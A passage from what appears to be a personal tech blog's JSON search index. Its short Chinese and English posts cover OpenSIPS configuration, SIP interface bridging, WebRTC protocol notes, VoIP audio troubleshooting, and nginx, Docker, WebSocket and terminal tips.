我们看一下opensips自带脚本的中的一小块。 里面就有三个要配置的地方\n这个listen的地址: listen=udp:127.0.0.1:5060 数据库地址的配置:modparam(\u0026ldquo;usrloc\u0026rdquo;, \u0026ldquo;db_url\u0026rdquo;, \u0026ldquo;dbdriver://username:password@dbhost/dbname\u0026rdquo;) 数据库地址的配置:modparam(\u0026ldquo;acc\u0026rdquo;, \u0026ldquo;db_url\u0026rdquo;, \u0026ldquo;mysql://user:password@localhost/opensips\u0026rdquo;) auto_aliases=no listen=udp:127.0.0.1:5060 # CUSTOMIZE ME mpath=\u0026#34;/usr/local//lib/opensips/modules/\u0026#34; loadmodule \u0026#34;usrloc.so\u0026#34; modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;db_url\u0026#34;, \u0026#34;dbdriver://username:password@dbhost/dbname\u0026#34;) modparam(\u0026#34;acc\u0026#34;, \u0026#34;early_media\u0026#34;, 0) modparam(\u0026#34;acc\u0026#34;, \u0026#34;report_cancels\u0026#34;, 0) modparam(\u0026#34;acc\u0026#34;, \u0026#34;detect_direction\u0026#34;, 0) modparam(\u0026#34;acc\u0026#34;, \u0026#34;db_url\u0026#34;, \u0026#34;mysql://user:password@localhost/opensips\u0026#34;) 随着脚本代码的增多,各种配置往往越来越多。真是脚本里,配置的地方远远不止三处!\n你开发了OpenSIPS的脚本,但是真正部署的服务的可能是其他人。那么其他拿到你的脚本的时候,他们怎么知道要改哪些地方呢,难道要搜索一下,所有出现#CUSTOMIZE ME的地方就是需要配置的? 难道他们每次部署一个服务,就要改一遍脚本的内容? 改错了谁负责?\n如果你不想被运维人员在背后骂娘,就不要把配置性的数据写死到脚本里!\n如果你不想在打游戏的时候被运维人员点电话问这个配置出错应该怎么解决,就不要把配置型数据写死到脚本里!\n** 那么,你就需要用到M4**\n什么是M4? M4是一种宏语言,如果你不清楚什么是宏,你就可以把M4想想成一种字符串替换的工具。\n如何安装M4? 大部分Linux上都已经默认安装了m4, 你可以用m4 --version检查一下m4是否已经存在。\nm4 --version Copyright © 2021 Free Software Foundation, Inc. GPLv3+ 许可证: GNU 通用公共许可证第三版或更高版本 \u0026lt;https://gnu.org/licenses/gpl.html\u0026gt;。 这是自由软件: 您可自由更改并重新分发它。 在法律所允许的范围内,不附带任何担保条款。 如果不存在的话,可以用对应常用的包管理工具来安装,例如\napt-get install m4 能否举个m4例子? hello-world.","title":"使用m4增强opensips.cfg脚本预处理能力"},{"content":"There are scenarios where you need OpenSIPS to route SIP traffic across more than one IP interface. Such a typical scenario is where OpenSIPS is required to perform bridging. The bridging may be between different IP networks (like public versus private, IPv4 versus IPv6) or between different transport protocols for SIP (like UDP versus TCP versus TLS).So, how do we switch to a different outbound interface in OpenSIPS ?\nAuto detection OpenSIPS has a built in automatic way of picking up the right outbound interface, the so called “Multi homed” support or shortly “mhomed”, controlled by the mhomed core parameter.The auto detection is done based on the destination IP of the SIP message. OpenSIPS will ‘query’ the kernel routing table to see which interface (on the server) is able to route to the needed destination IP.\nExample If we have an OpenSIPS listening on 1.2.3.4 public interface and 10.0.0.4 private interface and we need to send the SIP message to 10.0.0.100, the kernel will indicate that 10.0.0.100 is reachable/routable only via 10.0.0.4, so OpenSIPS will use that listener.\nAdvantages This a very easy way to achieve multi-interface routing, without any extra scripting logic. You just have to switch a single option and it simply works.\nDisadvantages First of all there is performance penalty here as each time a SIP message is sent out OpenSIPS will have to query the kernel for the right outbound interface.Also there are some limitation – as this auto detection is based on the kernel routing table, this approach can be used only when routing between different types of networks like private versus public or IPv4 versus IPv6. It cannot be used for switching between different SIP transport protocols.Even more, there is another limitation here – you need to correlate the kernel IP routing table with the listeners you have in OpenSIPS, otherwise you may end up in a situation where the kernel indicates as outbound interface an IP that it is not configured as listener in OpenSIPS!\nManual selection An alternative is to explicitly indicate to OpenSIPS what the outbound interface should be, based on the logic from the routing script. Like if my routing logic says that the call is to be sent to an end-point and I know that all my end-points are on the public network, then I can manually indicate OpenSIPS to use the listener on the public network. Or if my routing logic says that the call goes to a media server located in a private network, then I will instruct OpenSIPS to use the private listener.How do you do this? You can indicate the outbound interface/socket by “forcing the send socket” with the $fs variable.As the send socket description also contains indication for the transport protocol, this approach can be used for switching between different SIP transport protocols:\n# switch from TCP to UDP, preserving the IP if ($proto == \u0026#34;TCP\u0026#34;) $fs = \u0026#34;udp:\u0026#34; + $Ri + \u0026#34;:5060\u0026#34;; Manually setting the outbound interface is usually done only for the initial requests (without the To header “;tag=” parameter). Why? As you have to anchor the dialog into your OpenSIPS (otherwise the sequential requests will not be routed in bridging mode), you will do either record_route(), either topology_hiding(). These two ways of anchoring dialogs in OpenSIPS guarantees that all sequential requests will follow the same interface switching / bridging as the initial request. Like if you do the interface switch at INVITE time, there is no need for additional scripting for in-dialog requests (ACK, re-INVITE, BYE, etc.). Shortly, any custom interface handling is to be done only for the initial requests.\nExample Assuming the end-points are in the public interface and the media servers are in the private network, let’s see how the logic should be.But first, an useful hint : if your routing is based on lookup(“location”), there is no need to do manual setting of the outbound interface as the lookup() function will do this for you – it will automatically force as outbound interface the interface the corresponding REGISTER was received on ;).\n# is it a call to a media service (format *33xxxxx) ? if ($rU=~\u0026#34;^*33[0-9]+$\u0026#34;)) { $fs = \u0026#34;udp:10.0.0.100:5060\u0026#34;; route(to_media); exit; } Advantages This is a very rigorous way of controlling the interface switching in your OpenSIPS script, being able to cover all cases of network or protocol switching.Also, this adds zero performance penalty!\nDisadvantages You need to do some extra scripting and to correlate your SIP routing logic with the IP/transport switching logic. Nevertheless, it is very easy to do – just set a variable, so it will not pollute your script.\nConclusions Each approach has some clear advantages – if the auto-detection is very very simple to use for some simple scenarios, the manual selection is more powerful and complex but needs some extra scripting and SIP understanding.If you want to learn more, join us for the upcoming OpenSIPS Bootcamp training session and become a skillful OpenSIPS user! :).\n原文地址:https://blog.opensips.org/2018/09/04/sip-bridging-over-multiple-interfaces/\n","permalink":"https://wdd.js.org/opensips/blog/mutltiple-interface/","summary":"There are scenarios where you need OpenSIPS to route SIP traffic across more than one IP interface. Such a typical scenario is where OpenSIPS is required to perform bridging. The bridging may be between different IP networks (like public versus private, IPv4 versus IPv6) or between different transport protocols for SIP (like UDP versus TCP versus TLS).So, how do we switch to a different outbound interface in OpenSIPS ?\nAuto detection OpenSIPS has a built in automatic way of picking up the right outbound interface, the so called “Multi homed” support or shortly “mhomed”, controlled by the mhomed core parameter.","title":"SIP bridging over multiple interfaces"},{"content":"curl ip.sb curl cip.cc ","permalink":"https://wdd.js.org/posts/2020/07/bh7hy0/","summary":"curl ip.sb curl cip.cc ","title":"获取本机外部公网IP"},{"content":"标准文档 WebRTC https://w3c.github.io/webrtc-pc/ MediaStream https://www.w3.org/TR/mediacapture-streams/ 实现接口 MediaStream: 获取媒体流,例如从用户的摄像机或者麦克风 RTCPeerConnection: 音频或者视频呼叫,以及加密和带宽管理 RTCDataChannel: 端到端的数据交互 WebRTC架构 架构图颜色标识说明:\n紫色部分是Web开发者API层 蓝色实线部分是面向浏览器厂商的API层 蓝色虚线部分浏览器厂商可以自定义实现 WebRTC有三个模块:\nVoice Engine(音频引擎) Voice Engine包含iSAC/iLBC Codec(音频编解码器,前者是针对宽带和超宽带,后者是针对窄带) NetEQ for voice(处理网络抖动和语音包丢失) Echo Canceler(回声消除器)/ Noise Reduction(噪声抑制) Video Engine(视频引擎) VP8 Codec(视频图像编解码器) Video jitter buffer(视频抖动缓冲器,处理视频抖动和视频信息包丢失) Image enhancements(图像质量增强) Transport SRTP(安全的实时传输协议,用以音视频流传输) Multiplexing(多路复用) P2P,STUN+TURN+ICE(用于NAT网络和防火墙穿越的) 除此之外,安全传输可能还会用到DTLS(数据报安全传输),用于加密传输和密钥协商 整个WebRTC通信是基于UDP的 WebRTC底层协议 WebRTC 核心的协议都是在右侧基于 UDP 基础上搭建起来的。\n其中,ICE、STUN、TURN 用于内网穿透, 解决了获取与绑定外网映射地址,以及 keep alive 机制\nDTLS 用于对传输内容进行加密,可以看做是 UDP 版的 TLS。由于 WebRTC 对安全比较重视,这一层是必须的。所有WebRTC组件都必须加密,并且其JavaScript API只能用于安全源(HTTPS或本地主机)。信令机制并不是由WebRTC标准定义的,所以您必须确保使用安全协议。 SRTP 与 SRTCP 是对媒体数据的封装与传输控制协议 SCTP 是流控制传输协议,提供类似 TCP 的特性,SCTP 可以基于 UDP 上构建,在 WebRTC 里是在 DTLS 协议之上 RTCPeerConnection 用来建立和维护端到端连接,并提供高效的音视频流传输 RTCDataChannel 用来支持端到端的任意二进制数据传输 WebRTC 协议栈解释\nICE:互动式连接建立(RFC 5245) STUN:用于NAT的会话遍历实用程序(RFC 5389) TURN:在NAT周围使用继电器进行遍历(RFC 5766) SDP:会话描述协议(RFC 4566) DTLS:数据报传输层安全性(RFC 6347) SCTP:流控制传输协议(RFC 4960) SRTP:安全实时传输协议(RFC 3711) ","permalink":"https://wdd.js.org/fe/webrtc-notes/","summary":"标准文档 WebRTC https://w3c.github.io/webrtc-pc/ MediaStream https://www.w3.org/TR/mediacapture-streams/ 实现接口 MediaStream: 获取媒体流,例如从用户的摄像机或者麦克风 RTCPeerConnection: 音频或者视频呼叫,以及加密和带宽管理 RTCDataChannel: 端到端的数据交互 WebRTC架构 架构图颜色标识说明:\n紫色部分是Web开发者API层 蓝色实线部分是面向浏览器厂商的API层 蓝色虚线部分浏览器厂商可以自定义实现 WebRTC有三个模块:\nVoice Engine(音频引擎) Voice Engine包含iSAC/iLBC Codec(音频编解码器,前者是针对宽带和超宽带,后者是针对窄带) NetEQ for voice(处理网络抖动和语音包丢失) Echo Canceler(回声消除器)/ Noise Reduction(噪声抑制) Video Engine(视频引擎) VP8 Codec(视频图像编解码器) Video jitter buffer(视频抖动缓冲器,处理视频抖动和视频信息包丢失) Image enhancements(图像质量增强) Transport SRTP(安全的实时传输协议,用以音视频流传输) Multiplexing(多路复用) P2P,STUN+TURN+ICE(用于NAT网络和防火墙穿越的) 除此之外,安全传输可能还会用到DTLS(数据报安全传输),用于加密传输和密钥协商 整个WebRTC通信是基于UDP的 WebRTC底层协议 WebRTC 核心的协议都是在右侧基于 UDP 基础上搭建起来的。\n其中,ICE、STUN、TURN 用于内网穿透, 解决了获取与绑定外网映射地址,以及 keep alive 机制\nDTLS 用于对传输内容进行加密,可以看做是 UDP 版的 TLS。由于 WebRTC 对安全比较重视,这一层是必须的。所有WebRTC组件都必须加密,并且其JavaScript API只能用于安全源(HTTPS或本地主机)。信令机制并不是由WebRTC标准定义的,所以您必须确保使用安全协议。 SRTP 与 SRTCP 是对媒体数据的封装与传输控制协议 SCTP 是流控制传输协议,提供类似 TCP 的特性,SCTP 可以基于 UDP 上构建,在 WebRTC 里是在 DTLS 协议之上 RTCPeerConnection 用来建立和维护端到端连接,并提供高效的音视频流传输 RTCDataChannel 用来支持端到端的任意二进制数据传输 WebRTC 协议栈解释","title":"Webrtc Notes"},{"content":"通话质量差,一般可能以下因素有关。\n媒体服务器或者媒体代理服务器CPU, 内存异常 通信网络差 中继或者网关送过来的本来音质就不好。 解决思路:\n这个需要监控媒体服务器或者媒体代理CPU,内存是否正常 也可以在媒体代理上用tupdump抓包,然后用wireshark分析 调听服务端的录音,看看服务端录音是否也存在音质差的问题 ","permalink":"https://wdd.js.org/opensips/ch7/poor-quality/","summary":"通话质量差,一般可能以下因素有关。\n媒体服务器或者媒体代理服务器CPU, 内存异常 通信网络差 中继或者网关送过来的本来音质就不好。 解决思路:\n这个需要监控媒体服务器或者媒体代理CPU,内存是否正常 也可以在媒体代理上用tupdump抓包,然后用wireshark分析 调听服务端的录音,看看服务端录音是否也存在音质差的问题 ","title":"通话质量差"},{"content":" 这个问题很大可能和和SDP没有正确修改有关。需要排查SIP信令的sdp地址是否正确。 防火墙策略问题:有的网络允许udp出去,但是不允许udp进来。需要设置防火墙策略。 udp端口范围太小。一般一个通话需要占用4个udp端口。如果开放的udp端口太少,在通话达到一定数量后,就会出现一部分呼叫没有可用端口。 用户设备的问题。例如用户的电脑声卡或者扬声器出现问题。 由于网络的复杂性,还有很多可能 一般遇到这个问题,可以按照如下的思路排查:\n服务端有录音功能的,可以先在服务端听录音,看看服务端录音里是否正常。一般来说有四种情况。 两方的录音都没有 主叫方有,被叫方没有 被叫方有,主叫方没有 主被叫都有。但是就是一方听不到另一方。 通过排查服务端的录音,就可以大致知道到底是AB两个leg, 每个leg上的语音流收发的情况。\n从信令的的sdp中分析,这个需要一定的SIP协议的分析能力。有些时候,sdp里面的媒体地址不正确,也会导致媒体流无法正常首发。 NAT策略。NAT一般有四种,用的比较多的是端口限制型。这种NAT要求外网流量在进入NAT内部时,必需先有内部的流量出去。当内部流量出去之后,这个NAT洞才会出现,外部的流量才能从这个洞进入。如果NAT内部设备一直不发送rtp包,那么外部的流量即使进来,也会被防火墙拦截掉。 无论是运维人员还是开发人员,在遇到媒体流问题时,一定要先搞清楚整个软交换的网络拓扑架构。否则只能南辕北辙。 sngrep -cr, 加上r这个参数,可以实时观察媒体流的流动情况。是个非常好的功能。但是对于那种加密的媒体流,sngrep是抓不到的,这点要注意。常见的WebRTC的媒体流就是加密的。 最终如果还是解决不了,那么只能祭出最后的杀器:tcpdump + wireshark。服务端抓包的话,虽然sngrep可以抓包,但是比较浪费内存还可能会出现丢包。最好用tcpdump抓包成文件,然后在wireshark上分析。 ","permalink":"https://wdd.js.org/opensips/ch7/one-leg-audio/","summary":" 这个问题很大可能和和SDP没有正确修改有关。需要排查SIP信令的sdp地址是否正确。 防火墙策略问题:有的网络允许udp出去,但是不允许udp进来。需要设置防火墙策略。 udp端口范围太小。一般一个通话需要占用4个udp端口。如果开放的udp端口太少,在通话达到一定数量后,就会出现一部分呼叫没有可用端口。 用户设备的问题。例如用户的电脑声卡或者扬声器出现问题。 由于网络的复杂性,还有很多可能 一般遇到这个问题,可以按照如下的思路排查:\n服务端有录音功能的,可以先在服务端听录音,看看服务端录音里是否正常。一般来说有四种情况。 两方的录音都没有 主叫方有,被叫方没有 被叫方有,主叫方没有 主被叫都有。但是就是一方听不到另一方。 通过排查服务端的录音,就可以大致知道到底是AB两个leg, 每个leg上的语音流收发的情况。\n从信令的的sdp中分析,这个需要一定的SIP协议的分析能力。有些时候,sdp里面的媒体地址不正确,也会导致媒体流无法正常首发。 NAT策略。NAT一般有四种,用的比较多的是端口限制型。这种NAT要求外网流量在进入NAT内部时,必需先有内部的流量出去。当内部流量出去之后,这个NAT洞才会出现,外部的流量才能从这个洞进入。如果NAT内部设备一直不发送rtp包,那么外部的流量即使进来,也会被防火墙拦截掉。 无论是运维人员还是开发人员,在遇到媒体流问题时,一定要先搞清楚整个软交换的网络拓扑架构。否则只能南辕北辙。 sngrep -cr, 加上r这个参数,可以实时观察媒体流的流动情况。是个非常好的功能。但是对于那种加密的媒体流,sngrep是抓不到的,这点要注意。常见的WebRTC的媒体流就是加密的。 最终如果还是解决不了,那么只能祭出最后的杀器:tcpdump + wireshark。服务端抓包的话,虽然sngrep可以抓包,但是比较浪费内存还可能会出现丢包。最好用tcpdump抓包成文件,然后在wireshark上分析。 ","title":"一方听不到另外一方的声音"},{"content":"在通话接近30秒时,呼叫自动挂断。\n有很大的可能和丢失了ACK有关。这个需要用sngrep去抓包看SIP时序图来确定是否是ACK丢失。\n丢失ACK的原因很大可能是NAT没有处理好,或者是网络协议不匹配等等。\n","permalink":"https://wdd.js.org/opensips/ch7/30-seconds-drop/","summary":"在通话接近30秒时,呼叫自动挂断。\n有很大的可能和丢失了ACK有关。这个需要用sngrep去抓包看SIP时序图来确定是否是ACK丢失。\n丢失ACK的原因很大可能是NAT没有处理好,或者是网络协议不匹配等等。","title":"30秒自动挂断"},{"content":"exec user process caused \u0026#34;no such file or diectory\u0026#34; 解决方案: 将镜像构建的 Dockerfile ENTRYPOINT [\u0026quot;/run.sh\u0026quot;] 改为下面的\nENTRYPOINT [\u0026#34;sh\u0026#34;,\u0026#34;/run.sh\u0026#34;] 其实就是加了个sh\n","permalink":"https://wdd.js.org/posts/2020/07/docker-exec-user-process/","summary":"exec user process caused \u0026#34;no such file or diectory\u0026#34; 解决方案: 将镜像构建的 Dockerfile ENTRYPOINT [\u0026quot;/run.sh\u0026quot;] 改为下面的\nENTRYPOINT [\u0026#34;sh\u0026#34;,\u0026#34;/run.sh\u0026#34;] 其实就是加了个sh","title":"exec user process caused no such file or diectory"},{"content":"function report(msg:string){ var msg = new Image() msg.src = `/report?log=${msg}` } report ","permalink":"https://wdd.js.org/posts/2020/07/koow4y/","summary":"function report(msg:string){ var msg = new Image() msg.src = `/report?log=${msg}` } report ","title":"使用image标签上传日志"},{"content":"python Flask框架报错。刚开始我只关注了这个报错,没有看到这个报错上上面还有一个报错\nModuleNotFoundError: No module named \u0026#39;http.client\u0026#39;; \u0026#39;http\u0026#39; is not a package 实际上问题的关键其实是 'http' is not a package , 为什么会有这个报错呢?\n其实因为我自己在项目目录里新建一个叫做http.py的文件,这个文件名和python的标准库重名了,就导致了后续的一系列的问题。\n问题总结 文件名一定不要和某些标准库的文件名相同 排查问题的时候,一定要首先排查最先出现问题的点 ","permalink":"https://wdd.js.org/posts/2020/07/ncigfk/","summary":"python Flask框架报错。刚开始我只关注了这个报错,没有看到这个报错上上面还有一个报错\nModuleNotFoundError: No module named \u0026#39;http.client\u0026#39;; \u0026#39;http\u0026#39; is not a package 实际上问题的关键其实是 'http' is not a package , 为什么会有这个报错呢?\n其实因为我自己在项目目录里新建一个叫做http.py的文件,这个文件名和python的标准库重名了,就导致了后续的一系列的问题。\n问题总结 文件名一定不要和某些标准库的文件名相同 排查问题的时候,一定要首先排查最先出现问题的点 ","title":"ModuleNotFoundError: No module named 'SocketServer'"},{"content":"iTerm我已经使用了很长时间了,总体各方面的特点都非常好,但是有几个地方也是让我苦恼的地方。\ntab 页面的标题会根据执行的命令或者路径发生变化,如果你开了七八个ssh远程,有时候很难区分这个tab页面到底是连接的哪台机器。 如果你有十几个机器需要连接,你不可能手动输入ssh root@ip地址的方式去连接,太多了记不住。 如何维护多个远程host? 使用profile维护多个远程host, 每个profile对应连接到一台机器。profile name填入该host的名字。\n注意右边的Command, Send text at start的输入框,这个输入框,就是要执行的ssh指令,里面包含了远程host的地址。\n然后你就可以在Profils的菜单中选择一个profile进行连接了。\n如何让tab页面的标题不改变? 一定不要勾选Applications in terminal may change the title, 默认这项是勾选的。 Ttile一定要选择Name, badge的妙用? 如果标签页的tab的名称还不够强调当前tab页面是连接哪个标签页面的,你可以用用Badge去强调一下。\n","permalink":"https://wdd.js.org/posts/2020/06/ba84a7/","summary":"iTerm我已经使用了很长时间了,总体各方面的特点都非常好,但是有几个地方也是让我苦恼的地方。\ntab 页面的标题会根据执行的命令或者路径发生变化,如果你开了七八个ssh远程,有时候很难区分这个tab页面到底是连接的哪台机器。 如果你有十几个机器需要连接,你不可能手动输入ssh root@ip地址的方式去连接,太多了记不住。 如何维护多个远程host? 使用profile维护多个远程host, 每个profile对应连接到一台机器。profile name填入该host的名字。\n注意右边的Command, Send text at start的输入框,这个输入框,就是要执行的ssh指令,里面包含了远程host的地址。\n然后你就可以在Profils的菜单中选择一个profile进行连接了。\n如何让tab页面的标题不改变? 一定不要勾选Applications in terminal may change the title, 默认这项是勾选的。 Ttile一定要选择Name, badge的妙用? 如果标签页的tab的名称还不够强调当前tab页面是连接哪个标签页面的,你可以用用Badge去强调一下。","title":"iTerm2技巧 维护多个host与固定tab页面标题"},{"content":" 首先去官网查看一下,macos的系统版本和硬件以及ipad的版本是否支持随航。这是前提条件。 macos 和 ipad 需要登录同一个AppleID macos和iPad需要在同一个Wi-Fi下 遇到报错提示链接超时时:\nMacOS 退出apple账号,然后重新登录,登录完了之后重启电脑 再次尝试连接,就可以连接成功了。\n","permalink":"https://wdd.js.org/posts/2020/06/yh0oty/","summary":"首先去官网查看一下,macos的系统版本和硬件以及ipad的版本是否支持随航。这是前提条件。 macos 和 ipad 需要登录同一个AppleID macos和iPad需要在同一个Wi-Fi下 遇到报错提示链接超时时:\nMacOS 退出apple账号,然后重新登录,登录完了之后重启电脑 再次尝试连接,就可以连接成功了。","title":"MacOS 随航功能链接ipad超时"},{"content":"macos 升级后,发现git等命令都不可用了。\n第一次使用xcode-select \u0026ndash;install, 有报错。于是就用brew 安装了git。\nxcode-select --install 后续使用其他命令是,发现gcc命令也不可用。于是第二天又用 xcode-select --install 执行了一遍,忽然又可以正常安装开发软件了。\n所以又把brew 安装的git给卸载了。\n","permalink":"https://wdd.js.org/posts/2020/06/wetv3e/","summary":"macos 升级后,发现git等命令都不可用了。\n第一次使用xcode-select \u0026ndash;install, 有报错。于是就用brew 安装了git。\nxcode-select --install 后续使用其他命令是,发现gcc命令也不可用。于是第二天又用 xcode-select --install 执行了一遍,忽然又可以正常安装开发软件了。\n所以又把brew 安装的git给卸载了。","title":"xcrun: error: invalid active developer path"},{"content":"最近遇到一个问题,WebSocket总是会在下午出现比较大的断开的量。\n首先怀疑的是客户端的网络到服务端的网络出现抖动或者断开,要么就是入口的nginx有异常,或者是内部的服务出现异常。\n排查下来,发现nginx的最大打开文件个数是1024\nnginx master进程\nnginx work进程\n当进程打开文件数超过限制时,会发生什么? 当进程超过最大打开文件限制时,会收到SIGXFSZ信号。这个信号会默认行为会杀死一个进程。进程内部也可以捕获这个信号。\n我试着向nginx wrok进程发送SIGXFSZ信号, work进程会退出,然后master监听了这个事件后,会重新启动一个work进程。\nkill -XFSZ work_pid 在nginx的error.log文件中,可以看到类似的日志输出。\n这里的25就是XFSZ信号的整数表示。\n... [alert] ...#.: work process ... exited on signal 25 _\n参考 https://www.monitis.com/blog/6-best-practices-for-optimizing-your-nginx-performance/ https://www.cnblogs.com/shansongxian/p/9989631.html https://www.cnblogs.com/jpfss/p/9755706.html https://man7.org/linux/man-pages/man2/getrlimit.2.html https://man7.org/linux/man-pages/man5/proc.5.html ","permalink":"https://wdd.js.org/posts/2020/06/rlmqq8/","summary":"最近遇到一个问题,WebSocket总是会在下午出现比较大的断开的量。\n首先怀疑的是客户端的网络到服务端的网络出现抖动或者断开,要么就是入口的nginx有异常,或者是内部的服务出现异常。\n排查下来,发现nginx的最大打开文件个数是1024\nnginx master进程\nnginx work进程\n当进程打开文件数超过限制时,会发生什么? 当进程超过最大打开文件限制时,会收到SIGXFSZ信号。这个信号会默认行为会杀死一个进程。进程内部也可以捕获这个信号。\n我试着向nginx wrok进程发送SIGXFSZ信号, work进程会退出,然后master监听了这个事件后,会重新启动一个work进程。\nkill -XFSZ work_pid 在nginx的error.log文件中,可以看到类似的日志输出。\n这里的25就是XFSZ信号的整数表示。\n... [alert] ...#.: work process ... exited on signal 25 _\n参考 https://www.monitis.com/blog/6-best-practices-for-optimizing-your-nginx-performance/ https://www.cnblogs.com/shansongxian/p/9989631.html https://www.cnblogs.com/jpfss/p/9755706.html https://man7.org/linux/man-pages/man2/getrlimit.2.html https://man7.org/linux/man-pages/man5/proc.5.html ","title":"生产环境nginx配置"},{"content":"调研目的 在异常情况下,网络断开对WebSocket的影响 测试代码 测试代码没有心跳机制 心跳机制并不包含在WebSocket协议内部 var ws = new WebSocket(\u0026#39;wss://echo.websocket.org/\u0026#39;) ws.onopen =function(e){ console.log(\u0026#39;onopen\u0026#39;) } ws.onerror = function (e) { console.log(\u0026#39;onerror: \u0026#39; + e.code) console.log(e) } ws.onclose = function (e) { console.log(\u0026#39;onclose: \u0026#39; + e.code) console.log(e) } 场景1: 断网后,是否会立即触发onerror, 或者onclose事件? 答案:不会立即触发\n测试代码中没有心跳机制,断网后,并不会立即触发onerror或者onclose的回调函数。\n个人测试的情况\n及其 测试场景 Macbook pro chrome 83.0.4103.106 每隔10秒发送一次消息的情况下,40秒后出发onclose事件 Macbook pro chrome 83.0.4103.106 一直不发送消息,一直就不回出发onclose事件 Macbook pro chrome 83.0.4103.106 发出一个消息后? 场景2: 断网后,使用send()发送数据,回触发事件吗? 为什么无法准确拿到断开原因? WebSocket关闭事件中有三个属性\ncode 断开原因码 reason 具体原因 wasClean 是否是正常断开 官方文档上,code字段有很多个值。但是大多数情况下,要么拿到的值是undefined, 要么是1006,基本上没有其他情况。\n这并不是浏览器的bug, 这是浏览器故意这样做的。在w3c的官方文档上给出的原因其实是处于安全的考虑。\n试想一下,如果把断开原因给出的非常具体。那么一个恶意的js脚本就有可能做端口扫描或则恶意的注入。\nUser agents must not convey any failure information to scripts in a way that would allow a script to distinguish the following situations:\nA server whose host name could not be resolved.\nA server to which packets could not successfully be routed.\nA server that refused the connection on the specified port.\nA server that failed to correctly perform a TLS handshake (e.g., the server certificate can\u0026rsquo;t be verified).\nA server that did not complete the opening handshake (e.g. because it was not a WebSocket server).\nA WebSocket server that sent a correct opening handshake, but that specified options that caused the client to drop the connection (e.g. the server specified a subprotocol that the client did not offer).\nA WebSocket server that abruptly closed the connection after successfully completing the opening handshake.\nIn all of these cases, the the WebSocket connection close code would be 1006, as required by the WebSocket Protocol specification. [WSP]\nAllowing a script to distinguish these cases would allow a script to probe the user\u0026rsquo;s local network in preparation for an attack. https://www.w3.org/TR/websockets/%23concept-websocket-close-fail\n","permalink":"https://wdd.js.org/posts/2020/06/sbhglg/","summary":"调研目的 在异常情况下,网络断开对WebSocket的影响 测试代码 测试代码没有心跳机制 心跳机制并不包含在WebSocket协议内部 var ws = new WebSocket(\u0026#39;wss://echo.websocket.org/\u0026#39;) ws.onopen =function(e){ console.log(\u0026#39;onopen\u0026#39;) } ws.onerror = function (e) { console.log(\u0026#39;onerror: \u0026#39; + e.code) console.log(e) } ws.onclose = function (e) { console.log(\u0026#39;onclose: \u0026#39; + e.code) console.log(e) } 场景1: 断网后,是否会立即触发onerror, 或者onclose事件? 答案:不会立即触发\n测试代码中没有心跳机制,断网后,并不会立即触发onerror或者onclose的回调函数。\n个人测试的情况\n及其 测试场景 Macbook pro chrome 83.0.4103.106 每隔10秒发送一次消息的情况下,40秒后出发onclose事件 Macbook pro chrome 83.0.4103.106 一直不发送消息,一直就不回出发onclose事件 Macbook pro chrome 83.0.4103.106 发出一个消息后? 场景2: 断网后,使用send()发送数据,回触发事件吗? 为什么无法准确拿到断开原因? WebSocket关闭事件中有三个属性\ncode 断开原因码 reason 具体原因 wasClean 是否是正常断开 官方文档上,code字段有很多个值。但是大多数情况下,要么拿到的值是undefined, 要么是1006,基本上没有其他情况。","title":"[未完成] WebSocket调研"},{"content":"一般的sip网关同时具有信令和媒体处理的能力,如下图。\n但是也有信令和媒体分开的网关。在和网关信令交互过程中,网关会将媒体地址放到sdp中。\n难点就来了,在nat存在的场景下,你并不知道sdp里的媒体地址是否是真实的地址。\n那么你就要选择,是相信sdp中的媒体地址,还是把sip信令的源ip作为媒体地址呢?\n","permalink":"https://wdd.js.org/opensips/ch1/sip-rtp-path/","summary":"一般的sip网关同时具有信令和媒体处理的能力,如下图。\n但是也有信令和媒体分开的网关。在和网关信令交互过程中,网关会将媒体地址放到sdp中。\n难点就来了,在nat存在的场景下,你并不知道sdp里的媒体地址是否是真实的地址。\n那么你就要选择,是相信sdp中的媒体地址,还是把sip信令的源ip作为媒体地址呢?","title":"媒体路径与信令路径"},{"content":"1. 简介 媒体协商用来交换呼叫双方的媒体能力。如\n支持的编码类型有哪些 采样频率是多少 媒体端口,ip 信息 \u0026hellip; 媒体协商使用的是请求和应答模型。即一方向另一方发送含有 sdp 信息的消息,然后另一方更具对方提供的编码以及自己支持的编码,如果协商成功,则将协商后的消息 sdp 再次发送给对方。\n2. 常见的几个协商方式 2.1 在 INVITE 中 offer 2.2 在 200 OK 中 offer 2.3 在 UPDATE 中 offer 2.4 在 PRACK 中 offer 3. 常见的几个问题 一般呼叫到中继测时,中继回的 183 信令是会携带 sdp 信息的 一般打到分机时,分机回的 180 信令是没有 sdp 信息的 不要先入为主的认为,某些请求一定带有 sdp,某些请求一定没有 sdp。而应当去测试请求或者响应消息上有没有携带 sdp 信息。\n携带 sdp 信息的 sip 消息会出现下面的头\nContent-Type: application/sdp ","permalink":"https://wdd.js.org/opensips/ch1/offer-answer/","summary":"1. 简介 媒体协商用来交换呼叫双方的媒体能力。如\n支持的编码类型有哪些 采样频率是多少 媒体端口,ip 信息 \u0026hellip; 媒体协商使用的是请求和应答模型。即一方向另一方发送含有 sdp 信息的消息,然后另一方更具对方提供的编码以及自己支持的编码,如果协商成功,则将协商后的消息 sdp 再次发送给对方。\n2. 常见的几个协商方式 2.1 在 INVITE 中 offer 2.2 在 200 OK 中 offer 2.3 在 UPDATE 中 offer 2.4 在 PRACK 中 offer 3. 常见的几个问题 一般呼叫到中继测时,中继回的 183 信令是会携带 sdp 信息的 一般打到分机时,分机回的 180 信令是没有 sdp 信息的 不要先入为主的认为,某些请求一定带有 sdp,某些请求一定没有 sdp。而应当去测试请求或者响应消息上有没有携带 sdp 信息。\n携带 sdp 信息的 sip 消息会出现下面的头\nContent-Type: application/sdp ","title":"媒体协商 offer/answer模型"},{"content":"Decode As Udp wireshark 有时候并不能把udp包识别为rtp包,所以这边可能需要手动设置解码方式\n","permalink":"https://wdd.js.org/opensips/tools/wireshark-player-pcap/","summary":"Decode As Udp wireshark 有时候并不能把udp包识别为rtp包,所以这边可能需要手动设置解码方式","title":"wireshark 播放抓包文件"},{"content":"新建一个文件 ip.list.cfg, 包含所有的带测试的ip地址。\n192.168.40.20 192.168.40.21 执行命令:\nnohup fping -D -u -l -p 2000 -f ip.list.cfg \u0026amp; -D 显示时间戳 -u 显示不可达的目标 -l 持续的ping -p 每隔多少毫秒执行一次 -f 指定ip列表文件 在nohup.out中,回持续的显示到各个ip的网络状况。\n[1592643928.961414] 192.168.40.20 : [0], 84 bytes, 3.22 ms (3.22 avg, 0% loss) [1592643928.969987] 192.168.40.21 : [0], 84 bytes, 1.22 ms (1.22 